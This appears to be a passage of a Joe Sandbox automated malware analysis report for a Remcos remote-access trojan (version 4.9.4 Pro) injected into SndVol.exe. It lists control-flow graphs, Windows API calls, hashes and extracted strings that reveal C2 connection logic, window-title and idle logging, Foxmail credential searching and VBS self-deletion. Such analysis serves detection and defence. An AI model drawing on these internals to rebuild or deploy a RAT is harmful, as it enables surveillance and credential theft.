                                                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\SndVol.exe,00000104), ref: 0040E9EE
                                                                  • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                • String ID: Access Level: $Administrator$C:\Windows\SysWOW64\SndVol.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-TLPQMO$Software\$User$del$del$exepath$licence$license_code.txt
                                                                • API String ID: 2830904901-4071436221
                                                                • Opcode ID: 8aded3daff0edcfa8cb184647fb3ea8ccaf6a078b242c64e0ced05d86d0b8c43
                                                                • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                                                • Opcode Fuzzy Hash: 8aded3daff0edcfa8cb184647fb3ea8ccaf6a078b242c64e0ced05d86d0b8c43
                                                                • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 494 414f2a-414f72 call 4020df call 41b8b3 call 4020df call 401e65 call 401fab call 43baac 507 414f81-414fcd call 402093 call 401e65 call 4020f6 call 41be1b call 40489e call 401e65 call 40b9bd 494->507 508 414f74-414f7b Sleep 494->508 523 415041-4150dc call 402093 call 401e65 call 4020f6 call 41be1b call 401e65 * 2 call 406c1e call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 507->523 524 414fcf-41503e call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 507->524 508->507 577 4150ec-4150f3 523->577 578 4150de-4150ea 523->578 524->523 579 4150f8-41518a call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414ee9 577->579 578->579 606 4151d5-4151e3 call 40482d 579->606 607 41518c-4151d0 WSAGetLastError call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 579->607 612 415210-415225 call 404f51 call 4048c8 606->612 613 4151e5-41520b call 402093 * 2 call 41b4ef 606->613 629 415aa3-415ab5 call 404e26 call 4021fa 607->629 612->629 630 41522b-41537e call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 4 call 41b7e0 call 4145bd call 40905c call 441e81 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 4136f8 612->630 613->629 643 415ab7-415ad7 call 401e65 call 401fab call 43baac Sleep 629->643 644 415add-415ae5 call 401e8d 629->644 694 415380-41538d call 405aa6 630->694 695 415392-4153b9 call 401fab call 4135a6 630->695 643->644 644->523 694->695 701 4153c0-415a0a call 40417e call 40dd89 call 41bc42 call 41bd1e call 41bb8e call 401e65 GetTickCount call 41bb8e call 41bae6 call 41bb8e * 2 call 41ba96 call 41bd1e * 5 call 40f8d1 call 41bd1e call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 695->701 702 4153bb-4153bd 695->702 947 415a0f-415a16 701->947 702->701 948 415a18-415a1f 947->948 949 415a2a-415a31 947->949 948->949 952 415a21-415a23 948->952 950 415a33-415a38 call 40b051 949->950 951 415a3d-415a6f call 405a6b call 402093 * 2 call 41b4ef 949->951 950->951 963 415a71-415a7d CreateThread 951->963 964 415a83-415a9e call 401fd8 * 2 call 401f09 951->964 952->949 963->964 964->629
                                                                APIs
                                                                • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
                                                                • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                                                                • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                                                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep$ErrorLastLocalTime
                                                                • String ID: | $%I64u$4.9.4 Pro$C:\Windows\SysWOW64\SndVol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-TLPQMO$TLS Off$TLS On $hlight$name
                                                                • API String ID: 524882891-4159143756
                                                                • Opcode ID: baec00e3837a7035f20f569a256603985658fbe375bbfee4c54659d9ac92a87a
                                                                • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                                                                • Opcode Fuzzy Hash: baec00e3837a7035f20f569a256603985658fbe375bbfee4c54659d9ac92a87a
                                                                • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D

                                                                Control-flow Graph

                                                                APIs
                                                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 1E6C1434
                                                                  • Part of subcall function 1E6C10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 1E6C1137
                                                                  • Part of subcall function 1E6C10F1: lstrcatW.KERNEL32(?,?), ref: 1E6C1151
                                                                  • Part of subcall function 1E6C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1E6C115C
                                                                  • Part of subcall function 1E6C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1E6C116D
                                                                  • Part of subcall function 1E6C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1E6C117C
                                                                  • Part of subcall function 1E6C10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 1E6C1193
                                                                  • Part of subcall function 1E6C10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 1E6C11D0
                                                                  • Part of subcall function 1E6C10F1: FindClose.KERNEL32(00000000), ref: 1E6C11DB
                                                                • lstrlenW.KERNEL32(?), ref: 1E6C14C5
                                                                • lstrlenW.KERNEL32(?), ref: 1E6C14E0
                                                                • lstrlenW.KERNEL32(?,?), ref: 1E6C150F
                                                                • lstrcatW.KERNEL32(00000000), ref: 1E6C1521
                                                                • lstrlenW.KERNEL32(?,?), ref: 1E6C1547
                                                                • lstrcatW.KERNEL32(00000000), ref: 1E6C1553
                                                                • lstrlenW.KERNEL32(?,?), ref: 1E6C1579
                                                                • lstrcatW.KERNEL32(00000000), ref: 1E6C1585
                                                                • lstrlenW.KERNEL32(?,?), ref: 1E6C15AB
                                                                • lstrcatW.KERNEL32(00000000), ref: 1E6C15B7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4419973071.000000001E6C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E6C0000, based on PE: true
                                                                • Associated: 00000003.00000002.4419939980.000000001E6C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4419973071.000000001E6D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_1e6c0000_SndVol.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                • String ID: )$Foxmail$ProgramFiles
                                                                • API String ID: 672098462-2938083778
                                                                • Opcode ID: 68da5da609b269c2b02a7f677e6faf14948fdd13dab1c16789e70a52073ea9df
                                                                • Instruction ID: fd9ab76eeba68624deb81a0990ba0b12777463f5379a0d23a12da1da5976d792
                                                                • Opcode Fuzzy Hash: 68da5da609b269c2b02a7f677e6faf14948fdd13dab1c16789e70a52073ea9df
                                                                • Instruction Fuzzy Hash: 3C81B675A40358A9DB20DBA0DC45FEF7379EF84700F400A96F508E7191EFB16A88CB99

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1009 4048c8-4048e8 connect 1010 404a1b-404a1f 1009->1010 1011 4048ee-4048f1 1009->1011 1014 404a21-404a2f WSAGetLastError 1010->1014 1015 404a97 1010->1015 1012 404a17-404a19 1011->1012 1013 4048f7-4048fa 1011->1013 1016 404a99-404a9e 1012->1016 1017 404926-404930 call 420c60 1013->1017 1018 4048fc-404923 call 40531e call 402093 call 41b4ef 1013->1018 1014->1015 1019 404a31-404a34 1014->1019 1015->1016 1028 404941-40494e call 420e8f 1017->1028 1029 404932-40493c 1017->1029 1018->1017 1022 404a71-404a76 1019->1022 1023 404a36-404a6f call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 1019->1023 1025 404a7b-404a94 call 402093 * 2 call 41b4ef 1022->1025 1023->1015 1025->1015 1042 404950-404973 call 402093 * 2 call 41b4ef 1028->1042 1043 404987-404992 call 421a40 1028->1043 1029->1025 1072 404976-404982 call 420ca0 1042->1072 1055 4049c4-4049d1 call 420e06 1043->1055 1056 404994-4049c2 call 402093 * 2 call 41b4ef call 4210b2 1043->1056 1066 4049d3-4049f6 call 402093 * 2 call 41b4ef 1055->1066 1067 4049f9-404a14 CreateEventW * 2 1055->1067 1056->1072 1066->1067 1067->1012 1072->1015
                                                                APIs
                                                                • connect.WS2_32(FFFFFFFF,034A5460,00000010), ref: 004048E0
                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                • WSAGetLastError.WS2_32 ref: 00404A21
                                                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                • API String ID: 994465650-2151626615
                                                                • Opcode ID: d7da62a631306c53fd24c0cc8f944035cfa8a700400d4a180607be604b6ae82f
                                                                • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                                                • Opcode Fuzzy Hash: d7da62a631306c53fd24c0cc8f944035cfa8a700400d4a180607be604b6ae82f
                                                                • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF

                                                                Control-flow Graph

                                                                APIs
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                • FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
                                                                • String ID:
                                                                • API String ID: 2403171778-0
                                                                • Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                                                • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                                                • Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                                                • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1101 412ab4-412afd GetModuleFileNameW call 4020df * 3 1108 412aff-412b89 call 41b978 call 401fab call 40d9e8 call 401fd8 call 41b978 call 401fab call 40d9e8 call 401fd8 call 41b978 call 401fab call 40d9e8 call 401fd8 1101->1108 1133 412b8b-412c1b call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 418568 call 401f09 * 4 1108->1133 1156 412c2b 1133->1156 1157 412c1d-412c25 Sleep 1133->1157 1158 412c2d-412cbd call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 418568 call 401f09 * 4 1156->1158 1157->1133 1157->1156 1181 412ccd 1158->1181 1182 412cbf-412cc7 Sleep 1158->1182 1183 412ccf-412d5f call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 418568 call 401f09 * 4 1181->1183 1182->1158 1182->1181 1206 412d61-412d69 Sleep 1183->1206 1207 412d6f-412d94 1183->1207 1206->1183 1206->1207 1208 412d98-412db4 call 401f04 call 41c485 1207->1208 1213 412db6-412dc5 call 401f04 DeleteFileW 1208->1213 1214 412dcb-412de7 call 401f04 call 41c485 1208->1214 1213->1214 1221 412e04 1214->1221 1222 412de9-412e02 call 401f04 DeleteFileW 1214->1222 1224 412e08-412e24 call 401f04 call 41c485 1221->1224 1222->1224 1230 412e26-412e38 call 401f04 DeleteFileW 1224->1230 1231 412e3e-412e40 1224->1231 1230->1231 1232 412e42-412e44 1231->1232 1233 412e4d-412e58 Sleep 1231->1233 1232->1233 1236 412e46-412e4b 1232->1236 1233->1208 1237 412e5e-412e70 call 406b28 1233->1237 1236->1233 1236->1237 1240 412e72-412e80 call 406b28 1237->1240 1241 412ec6-412ee5 call 401f09 * 3 1237->1241 1240->1241 1247 412e82-412e90 call 406b28 1240->1247 1252 412eea-412f4e call 40b904 call 401f04 call 4020f6 call 41322d call 401f09 call 405b05 1241->1252 1247->1241 1253 412e92-412ebe Sleep call 401f09 * 3 1247->1253 1273 412f54-4130a3 call 41bd1e call 41bb8e call 402f31 call 402f10 * 6 call 402ea1 call 402f10 call 402ea1 call 404aa1 call 401fd8 * 10 1252->1273 1274 4130a8-413151 call 41bd1e call 402f31 call 402f10 * 6 call 402ea1 call 404aa1 1252->1274 1253->1108 1267 412ec4 1253->1267 1267->1252 1343 4131a5-41322c call 401fd8 call 401f09 call 401fd8 * 9 1273->1343 1314 413156-4131a1 call 401fd8 * 7 1274->1314 1314->1343
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                                                • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                                                • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                                                • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                                                • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                                                • Sleep.KERNEL32(00000064), ref: 00412E94
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                • String ID: /stext "
                                                                • API String ID: 1223786279-3856184850
                                                                • Opcode ID: f4066ae0bc76c7e97e531bcb4a044ea9ce00684355ce54794e05eada92b54f68
                                                                • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                                                • Opcode Fuzzy Hash: f4066ae0bc76c7e97e531bcb4a044ea9ce00684355ce54794e05eada92b54f68
                                                                • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A

                                                                Control-flow Graph

                                                                APIs
                                                                • __Init_thread_footer.LIBCMT ref: 0040AD38
                                                                • Sleep.KERNEL32(000001F4), ref: 0040AD43
                                                                • GetForegroundWindow.USER32 ref: 0040AD49
                                                                • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                                                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                                                                • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                                                  • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                • String ID: [${ User has been idle for $ minutes }$]
                                                                • API String ID: 911427763-3954389425
                                                                • Opcode ID: 11deb2e1d1f8f3844bb158fc8ccdcdbeb0aecbc925d29af6944428c3672480c4
                                                                • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                                                                • Opcode Fuzzy Hash: 11deb2e1d1f8f3844bb158fc8ccdcdbeb0aecbc925d29af6944428c3672480c4
                                                                • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1458 40da34-40da59 call 401f86 1461 40db83-40dc1b call 401f04 GetLongPathNameW call 40417e * 2 call 40ddd1 call 402fa5 * 2 call 401f09 * 5 1458->1461 1462 40da5f 1458->1462 1463 40da70-40da7e call 41b5b4 call 401f13 1462->1463 1464 40da91-40da96 1462->1464 1465 40db51-40db56 1462->1465 1466 40daa5-40daac call 41bfb7 1462->1466 1467 40da66-40da6b 1462->1467 1468 40db58-40db5d 1462->1468 1469 40da9b-40daa0 1462->1469 1470 40db6e 1462->1470 1471 40db5f-40db6c call 43c0cf 1462->1471 1489 40da83 1463->1489 1473 40db73-40db78 call 43c0cf 1464->1473 1465->1473 1487 40db00-40db4c call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1466->1487 1488 40daae-40dafe call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1466->1488 1467->1473 1468->1473 1469->1473 1470->1473 1471->1470 1483 40db79-40db7e call 409057 1471->1483 1473->1483 1483->1461 1487->1489 1495 40da87-40da8c call 401f09 1488->1495 1489->1495 1495->1461
                                                                APIs
                                                                • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DB9A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LongNamePath
                                                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                • API String ID: 82841172-425784914
                                                                • Opcode ID: da5f0060826a558894883e6bfc0be8872fb7d3565c3035b4badf37544c73e64a
                                                                • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                                                • Opcode Fuzzy Hash: da5f0060826a558894883e6bfc0be8872fb7d3565c3035b4badf37544c73e64a
                                                                • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1574 41c3f1-41c402 1575 41c404-41c407 1574->1575 1576 41c41a-41c421 1574->1576 1577 41c410-41c418 1575->1577 1578 41c409-41c40e 1575->1578 1579 41c422-41c43b CreateFileW 1576->1579 1577->1579 1578->1579 1580 41c441-41c446 1579->1580 1581 41c43d-41c43f 1579->1581 1583 41c461-41c472 WriteFile 1580->1583 1584 41c448-41c456 SetFilePointer 1580->1584 1582 41c47f-41c484 1581->1582 1585 41c474 1583->1585 1586 41c476-41c47d FindCloseChangeNotification 1583->1586 1584->1583 1587 41c458-41c45f CloseHandle 1584->1587 1585->1586 1586->1582 1587->1581
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C459
                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 0041C477
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Close$ChangeCreateFindHandleNotificationPointerWrite
                                                                • String ID: hpF
                                                                • API String ID: 1087594267-151379673
                                                                • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                                • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                                                • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                                • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1588 41b2c3-41b31a call 41bfb7 call 4135a6 call 401fe2 call 401fd8 call 406ae1 1599 41b35d-41b366 1588->1599 1600 41b31c-41b32b call 4135a6 1588->1600 1601 41b368-41b36d 1599->1601 1602 41b36f 1599->1602 1605 41b330-41b347 call 401fab StrToIntA 1600->1605 1604 41b374-41b37f call 40537d 1601->1604 1602->1604 1610 41b355-41b358 call 401fd8 1605->1610 1611 41b349-41b352 call 41cf69 1605->1611 1610->1599 1611->1610
                                                                APIs
                                                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
